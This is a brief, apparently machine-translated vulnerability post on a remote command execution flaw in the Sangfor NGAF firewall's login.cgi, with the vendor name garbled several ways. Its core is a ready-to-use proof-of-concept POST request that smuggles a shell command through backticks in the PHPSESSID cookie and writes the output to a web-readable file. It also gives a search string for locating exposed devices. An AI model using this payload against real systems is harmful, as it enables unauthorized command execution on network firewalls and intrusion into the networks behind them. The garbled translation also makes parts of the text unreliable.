Deepin Consensus Ngaf Next Generation Firewall Login Cgi Remote Command Execution Vulnerability
Deepin Consensus Ngaf Next Generation Firewall Login Cgi Remote Command Execution Vulnerability
Deepin Consensus NGAF next-generation firewall login.cgi remote command execution vulnerability
Vulnerability Description
Deepinfo Next Generation Firewall is a next-generation application firewall designed based on application security needs.
Vulnerability Impact
Shenxin NGAF next-generation firewall
Network surveying and mapping
“Redirect.php?url=LogInOut.php”
Vulnerability reappears
Login page
Verify POC
POST /cgi-bin/login.cgi HTTP/1.1
Host:
Cache-Control: max-age=0
Content-Type: Application/X-www-Form
y-forwarded-for: 127.0.0.1
Cookie: PHPSESSID=`$(id > /fwlib/sys/virus/webui/svpn_html/3.txt)`;
{"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "NSLB" , "privacy_enable": "0"}}
/svpn_html/3.txt
This post is licensed under CC BY 4.0 by the author.